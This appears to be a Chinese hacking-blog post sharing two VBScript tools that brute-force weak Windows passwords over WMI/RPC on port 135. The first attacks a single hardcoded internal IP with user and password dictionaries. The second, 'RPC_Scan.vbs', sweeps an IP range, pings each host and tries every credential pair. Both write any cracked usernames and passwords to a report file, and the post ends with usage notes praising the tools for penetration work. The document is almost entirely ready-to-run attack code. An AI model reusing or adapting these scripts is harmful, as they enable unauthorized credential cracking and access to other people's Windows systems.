135端口扫弱口令的vbs((效率低下))

作者:lcx
来源:vbs小铺

On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")

Function     filenumshow(filename,i)
Dim     temparray
if     not     fso.fileExists(filename)     then     exit     Function
set     f     =     fso.opentextfile(filename,1)
if     not     f.AtEndofStream     then
tempcnt     =     f.readall
temparray     =     split(tempcnt,chr(13)&chr(10))
filenumshow=temparray(i)
f.close
End     if
End     Function

Function     filenum(filename)
Dim     temparray
if     not     fso.fileExists(filename)     then     exit     Function
set     f     =     fso.opentextfile(filename,1)
if     not     f.AtEndofStream     then
tempcnt     =     f.readall
temparray     =     split(tempcnt,chr(13)&chr(10))
lineNum=ubound(temparray)
filenum=lineNum
f.close
End     if
End     Function

For i=0 To filenum("c:\user.txt")
user=filenumshow("c:\user.txt",i)
If user="" Then Exit for
For l=0 To     filenum("c:\pass.txt")
pass=filenumshow("c:\pass.txt",l)
wscript.echo user&Space(5)&pass
Call Scan("192.168.8.10",user,pass,"c:\log.txt")
If Err.number=0 Then
wscript.echo "find!!!"
Exit For
End if
wscript.echo Err.number&Space(10)&Err.source&Space(10)&Err.Description
Err.clear
next
Next

Sub Scan(ipaddress,username,password,report)
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
Set colItems = objswbemservices.ExecQuery("Select * From Win32_OperatingSystem")
with fso.opentextfile(report,8,true)
.writeline "==================================================="
For Each objItem in ColItems
.writeline ipaddress & ": " & objItem.Caption
Next
.writeline "username:"&username
.writeline "password:"&password
.writeline "==================================================="
.close
end with
end Sub
set fso=nothing

++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy Penetration Testing

on error resume next

if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if
if wscript.arguments.count<5 Then
wscript.echo "RPC_Scan.vbs"
wscript.echo "Code by NetPatch(www.icehack.com) 07.7.5"
wscript.echo "Thx KVO,Lcx"
wscript.echo "use: cscript "&wscript.scriptfullname&" Begin_Ip End_Ip User_dic Pass_dic Report_Path"
wscript.quit
end if

Begin_IP=wscript.arguments(0)
End_IP=wscript.arguments(1)
User_Dic=wscript.arguments(2)
Pass_Dic=wscript.arguments(3)
Report_Path=wscript.arguments(4)
S_Ip = Split(Begin_Ip, ".", -1, 1)
E_Ip =Split(End_Ip, ".", -1, 1)
If S_Ip(0) = E_Ip(0) And S_Ip(1) = E_Ip(1) And S_Ip(2) = E_Ip(2) And CInt(S_Ip(3)) <= CInt(E_Ip(3)) And CInt(E_Ip(3)) < 255 Then
SE_Ip=S_Ip(0)&"."&S_Ip(1)&"."&S_Ip(2)
Set objPings = GetObject("winmgmts:{impersonationLevel=impersonate}")
set objlocator=createobject("wbemscripting.swbemlocator")

For num=CInt(S_Ip(3)) To CInt(E_Ip(3))
aMachines = SE_Ip&"."&num

Set objPing=objPings._
ExecQuery("select * from Win32_PingStatus where address = '"_
& aMachines & "'")
For Each objStatus in objPing
If IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 Then
If user_dic <> "" Or pass_dic <> "" Then
set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.opentextfile(User_Dic,1,false)
ok=false
do while file.atendofline <> True
user_dic=file.readline
Set files=fso.opentextfile(Pass_Dic,1,false)
do while files.atendofline <> True
pass_dic=files.readline
wscript.echo "Conneting "&aMachines&"...."
wscript.echo "user:"&user_dic
wscript.echo "pass:"&pass_dic
call Scan(aMachines,User_Dic,Pass_Dic,Report_Path)
If Err.Number = 0 Then Exit Do
Err.clear
Loop
files.close
Loop
file.close
set fso=nothing
End If
Else
WScript.Echo(aMachines & " is not reachable")
End If
Next
Next
End if

Sub Scan(ipaddress,username,password,report)
set objWservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
Set colItems = objWservices.ExecQuery _
("Select * From Win32_OperatingSystem")
with fso.opentextfile(report,8,true)
.writeline "==================================================="
For Each objItem in ColItems
.writeline ipaddress & ": " & objItem.Caption
Next
.writeline "username:"&username
.writeline "password:"&password
.writeline "==================================================="
.close
end with
end sub

用法:
cscript RPC_Scan.vbs Begin_Ip End_Ip User_dic Pass_dic Report_Path
Begin_Ip //开始IP
End_Ip //结束IP
User_dic//用户列表
Pass_dic//密码档
Report_Path//输出报告路径

利用RPC(135端口进行密码猜解)
//渗透时比较好使.

相关日志

发表评论